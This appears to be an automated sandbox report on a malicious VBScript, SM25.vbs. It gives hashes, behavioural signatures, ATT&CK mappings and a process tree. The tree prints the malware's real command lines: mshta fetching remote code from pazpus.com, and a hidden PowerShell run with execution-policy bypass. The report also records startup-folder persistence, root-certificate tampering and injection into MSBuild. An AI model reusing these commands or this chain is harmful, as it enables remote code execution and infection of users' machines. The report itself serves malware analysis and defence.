7a74348cfdcf7d37e88f264c0b9a50b5b9cbec188ca02da0bcca6f054a1b183e

General

Target

SM25.vbs
Size

996B
MD5

0bafdab6b8c7bfc2867f8a8ff1437c40
SHA1

eb624db807094865eb14504f323301a0fd2cd95e
SHA256

7a74348cfdcf7d37e88f264c0b9a50b5b9cbec188ca02da0bcca6f054a1b183e
SHA512

9f77c88356140e7433ffcbb2ffd40f013dfa3fb962fdf17afcccc26a274b11eb45c778136d9f1c3054a5f437eb238ab081d19f58482efea550bab410838c5e65

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 4 IoCs

Processes:

mshta.exepowershell.exe

flow pid process

7 1000 mshta.exe
9 1000 mshta.exe
11 1000 mshta.exe
17 3760 powershell.exe

flow	pid	process
7	1000	mshta.exe
9	1000	mshta.exe
11	1000	mshta.exe
17	3760	powershell.exe

Drops startup file 2 IoCs

Processes:

WScript.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SM25.vbs	WScript.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SM25.vbs	WScript.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

24 ip-api.com

flow	ioc
24	ip-api.com

Suspicious use of SetThreadContext 3 IoCs

Processes:

powershell.exe

description	pid	process	target process
PID 3760 set thread context of 1720	3760	powershell.exe	MSBuild.exe
PID 3760 set thread context of 1360	3760	powershell.exe	MSBuild.exe
PID 3760 set thread context of 1732	3760	powershell.exe	MSBuild.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies system certificate store 2 TTPs 2 IoCs

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

mshta.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	mshta.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	mshta.exe

Suspicious behavior: EnumeratesProcesses 15 IoCs

Processes:

powershell.exepowershell.exepowershell.exedw20.exe

pid	process
1752	powershell.exe
1752	powershell.exe
1752	powershell.exe
852	powershell.exe
852	powershell.exe
852	powershell.exe
3760	powershell.exe
3760	powershell.exe
3760	powershell.exe
3760	powershell.exe
3760	powershell.exe
3760	powershell.exe
3760	powershell.exe
2808	dw20.exe
2808	dw20.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

powershell.exepowershell.exepowershell.exedw20.exeMSBuild.exe

description	pid	process
Token: SeDebugPrivilege	1752	powershell.exe
Token: SeDebugPrivilege	852	powershell.exe
Token: SeDebugPrivilege	3760	powershell.exe
Token: SeRestorePrivilege	2808	dw20.exe
Token: SeBackupPrivilege	2808	dw20.exe
Token: SeDebugPrivilege	1732	MSBuild.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

MSBuild.exe

pid process

1732 MSBuild.exe

pid	process
1732	MSBuild.exe

Suspicious use of WriteProcessMemory 41 IoCs

Processes:

WScript.exepowershell.exemshta.exepowershell.exeMSBuild.exe

description	pid	process	target process
PID 1144 wrote to memory of 1752	1144	WScript.exe	powershell.exe
PID 1144 wrote to memory of 1752	1144	WScript.exe	powershell.exe
PID 1752 wrote to memory of 1000	1752	powershell.exe	mshta.exe
PID 1752 wrote to memory of 1000	1752	powershell.exe	mshta.exe
PID 1000 wrote to memory of 852	1000	mshta.exe	powershell.exe
PID 1000 wrote to memory of 852	1000	mshta.exe	powershell.exe
PID 1144 wrote to memory of 3760	1144	WScript.exe	powershell.exe
PID 1144 wrote to memory of 3760	1144	WScript.exe	powershell.exe
PID 3760 wrote to memory of 1720	3760	powershell.exe	MSBuild.exe
PID 3760 wrote to memory of 1720	3760	powershell.exe	MSBuild.exe
PID 3760 wrote to memory of 1720	3760	powershell.exe	MSBuild.exe
PID 3760 wrote to memory of 1720	3760	powershell.exe	MSBuild.exe
PID 3760 wrote to memory of 1720	3760	powershell.exe	MSBuild.exe
PID 3760 wrote to memory of 1720	3760	powershell.exe	MSBuild.exe
PID 3760 wrote to memory of 1720	3760	powershell.exe	MSBuild.exe
PID 3760 wrote to memory of 1720	3760	powershell.exe	MSBuild.exe
PID 3760 wrote to memory of 3772	3760	powershell.exe	MSBuild.exe
PID 3760 wrote to memory of 3772	3760	powershell.exe	MSBuild.exe
PID 3760 wrote to memory of 3772	3760	powershell.exe	MSBuild.exe
PID 3760 wrote to memory of 768	3760	powershell.exe	MSBuild.exe
PID 3760 wrote to memory of 768	3760	powershell.exe	MSBuild.exe
PID 3760 wrote to memory of 768	3760	powershell.exe	MSBuild.exe
PID 3760 wrote to memory of 1360	3760	powershell.exe	MSBuild.exe
PID 3760 wrote to memory of 1360	3760	powershell.exe	MSBuild.exe
PID 3760 wrote to memory of 1360	3760	powershell.exe	MSBuild.exe
PID 3760 wrote to memory of 1360	3760	powershell.exe	MSBuild.exe
PID 3760 wrote to memory of 1360	3760	powershell.exe	MSBuild.exe
PID 3760 wrote to memory of 1360	3760	powershell.exe	MSBuild.exe
PID 3760 wrote to memory of 1360	3760	powershell.exe	MSBuild.exe
PID 3760 wrote to memory of 1360	3760	powershell.exe	MSBuild.exe
PID 3760 wrote to memory of 1732	3760	powershell.exe	MSBuild.exe
PID 3760 wrote to memory of 1732	3760	powershell.exe	MSBuild.exe
PID 3760 wrote to memory of 1732	3760	powershell.exe	MSBuild.exe
PID 3760 wrote to memory of 1732	3760	powershell.exe	MSBuild.exe
PID 3760 wrote to memory of 1732	3760	powershell.exe	MSBuild.exe
PID 3760 wrote to memory of 1732	3760	powershell.exe	MSBuild.exe
PID 3760 wrote to memory of 1732	3760	powershell.exe	MSBuild.exe
PID 3760 wrote to memory of 1732	3760	powershell.exe	MSBuild.exe
PID 1360 wrote to memory of 2808	1360	MSBuild.exe	dw20.exe
PID 1360 wrote to memory of 2808	1360	MSBuild.exe	dw20.exe
PID 1360 wrote to memory of 2808	1360	MSBuild.exe	dw20.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SM25.vbs"
1⤵
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:1144

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\Windows\System32\mshta https://pazpus.com/bootstrap/cache/zender.txt
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1752

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" https://pazpus.com/bootstrap/cache/zender.txt
3⤵
- Blocklisted process makes network request
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:1000

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:852

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -command C:\Users\Public\Datax.ps1;
2⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3760

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
3⤵
PID:1720

C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe"
3⤵
PID:3772

C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe"
3⤵
PID:768

C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:1360

C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
dw20.exe -x -s 708
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2808

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1732

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Install Root Certificate

1

T1130

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
MD5
c6b0a774fa56e0169ed7bb7b25c114dd

SHA1
bcdba7d4ecfff2180510850e585b44691ea81ba5

SHA256
b87210c4a0814394371ec7fba00fc02d9adbb22bcb1811a2abab46fdf4325da9

SHA512
42295d57f735c31749235c8463ac2c31778bff46a6a16c87918440d0b2fc70d2f1f6fb10d2499105866f7022108bbda4268d2580356245bd19bbed1ee3a2c446

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
MD5
2143b379fed61ab5450bab1a751798ce

SHA1
32f5b4e8d1387688ee5dec6b3cc6fd27b454f19e

SHA256
a2c739624812ada0913f2fbfe13228e7e42a20efdcb6d5c4e111964f9b620f81

SHA512
0bc39e3b666fdad76bcf4fe7e7729c9e8441aa2808173efc8030ce07c753cb5f7e25d81dd8ec75e7a5b6324b7504ff461e470023551976a2a6a415d6a4859bfa

Download Submit
C:\Users\Public\Datax.ps1
MD5
1528b8b5cf18ecec9301b85857229cee

SHA1
33e9a4e6708165c16aa504a78d12e06b5a114732

SHA256
2a8bfceffcf3160eac54e71049566c7dfa2dc0651301b4dfe1c0d247d7ba875c

SHA512
4f9b247f87ae844418cf3c210e88b9c745a0ae1249221ce6177be40f92cc23e7a64d29bc6666d942203d8fffefd41a6d62a2ad39cd69bf4a14a8228cd1892d7e

Download Submit
memory/852-15-0x00000149B0190000-0x00000149B0192000-memory.dmp

Filesize
8KB

Download
memory/852-10-0x0000000000000000-mapping.dmp

Download
memory/852-12-0x00007FFB53CA0000-0x00007FFB5468C000-memory.dmp

Filesize
9.9MB

Download
memory/852-14-0x00000149C91F0000-0x00000149C91F1000-memory.dmp

Filesize
4KB

Download
memory/852-16-0x00000149B0193000-0x00000149B0195000-memory.dmp

Filesize
8KB

Download
memory/1000-8-0x0000000000000000-mapping.dmp

Download
memory/1360-42-0x00000000031B0000-0x00000000031B1000-memory.dmp

Filesize
4KB

Download
memory/1360-32-0x00000000004581DE-mapping.dmp

Download
memory/1720-36-0x00000000734F0000-0x0000000073BDE000-memory.dmp

Filesize
6.9MB

Download
memory/1720-48-0x0000000005410000-0x0000000005411000-memory.dmp

Filesize
4KB

Download
memory/1720-51-0x00000000054C0000-0x00000000054C1000-memory.dmp

Filesize
4KB

Download
memory/1720-29-0x0000000000400000-0x000000000045E000-memory.dmp

Filesize
376KB

Download
memory/1720-30-0x00000000004581DE-mapping.dmp

Download
memory/1732-43-0x0000000005470000-0x0000000005471000-memory.dmp

Filesize
4KB

Download
memory/1732-34-0x00000000004581DE-mapping.dmp

Download
memory/1732-58-0x0000000006480000-0x0000000006481000-memory.dmp

Filesize
4KB

Download
memory/1732-57-0x0000000006110000-0x0000000006111000-memory.dmp

Filesize
4KB

Download
memory/1732-56-0x0000000005D20000-0x0000000005D21000-memory.dmp

Filesize
4KB

Download
memory/1732-54-0x00000000051B0000-0x00000000051B1000-memory.dmp

Filesize
4KB

Download
memory/1732-52-0x0000000004F20000-0x0000000004F21000-memory.dmp

Filesize
4KB

Download
memory/1732-35-0x00000000734F0000-0x0000000073BDE000-memory.dmp

Filesize
6.9MB

Download
memory/1752-4-0x000001E5AA900000-0x000001E5AA901000-memory.dmp

Filesize
4KB

Download
memory/1752-5-0x000001E5C4FE0000-0x000001E5C4FE1000-memory.dmp

Filesize
4KB

Download
memory/1752-3-0x00007FFB560F0000-0x00007FFB56ADC000-memory.dmp

Filesize
9.9MB

Download
memory/1752-7-0x000001E5AA8C3000-0x000001E5AA8C5000-memory.dmp

Filesize
8KB

Download
memory/1752-9-0x000001E5AA8C6000-0x000001E5AA8C8000-memory.dmp

Filesize
8KB

Download
memory/1752-6-0x000001E5AA8C0000-0x000001E5AA8C2000-memory.dmp

Filesize
8KB

Download
memory/1752-2-0x0000000000000000-mapping.dmp

Download
memory/2808-45-0x0000000002740000-0x0000000002741000-memory.dmp

Filesize
4KB

Download
memory/2808-46-0x00000000029D0000-0x00000000029D1000-memory.dmp

Filesize
4KB

Download
memory/2808-37-0x0000000000000000-mapping.dmp

Download
memory/2808-47-0x00000000029D0000-0x00000000029D1000-memory.dmp

Filesize
4KB

Download
memory/3760-23-0x0000028255163000-0x0000028255165000-memory.dmp

Filesize
8KB

Download
memory/3760-19-0x00007FFB53CA0000-0x00007FFB5468C000-memory.dmp

Filesize
9.9MB

Download
memory/3760-18-0x0000000000000000-mapping.dmp

Download
memory/3760-28-0x0000028256C80000-0x0000028256C88000-memory.dmp

Filesize
32KB

Download
memory/3760-27-0x0000028256C70000-0x0000028256C7A000-memory.dmp

Filesize
40KB

Download
memory/3760-26-0x0000028255166000-0x0000028255168000-memory.dmp

Filesize
8KB

Download
memory/3760-21-0x0000028255160000-0x0000028255162000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads